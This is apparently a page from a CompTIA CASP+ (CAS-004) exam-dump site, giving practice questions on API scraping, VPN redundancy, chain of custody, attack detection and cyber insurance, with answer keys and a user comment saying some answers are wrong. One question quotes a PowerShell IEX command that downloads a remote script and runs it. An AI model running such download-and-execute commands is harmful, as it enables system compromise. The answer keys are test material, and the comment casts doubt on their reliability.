CompTIA CAS-004 Exam (page: 22)
CompTIA Advanced Security Practitioner (CASP+) CAS-004
Updated on: 12-Jan-2026

Viewing Page 22 of 112

A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)

  A. Bot protection
  B. OAuth 2.0
  C. Input validation
  D. Autoscaling endpoints
  E. Rate limiting
  F. CSRF protection

Answer(s): A,E


Reference:

https://stackoverflow.com/questions/3161548/how-do-i-prevent-site-scraping



An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?

  A. Adding a second redundant layer of alternate vendor VPN concentrators
  B. Using Base64 encoding within the existing site-to-site VPN connections
  C. Distributing security resources across VPN sites
  D. Implementing IDS services with each VPN concentrator
  E. Transitioning to a container-based architecture for site-based services

Answer(s): A



A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?

  A. Encryption in transit
  B. Legal issues
  C. Chain of custody
  D. Order of volatility
  E. Key exchange

Answer(s): C



A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:

`powershell IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?

  A. Antivirus and UEBA
  B. Reverse proxy and sandbox
  C. EDR and application approved list
  D. Forward proxy and MFA

Answer(s): C



As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?

  A. Risk rejection
  B. Risk mitigation
  C. Risk transference
  D. Risk avoidance

Answer(s): C


Reference:

https://hbr.org/2021/01/cybersecurity-insurance-has-a-big-problem







9eagles 4/7/2023 10:04:00 AM

On question 10, and so far 2 wrong answers, as is evident in the included reference link.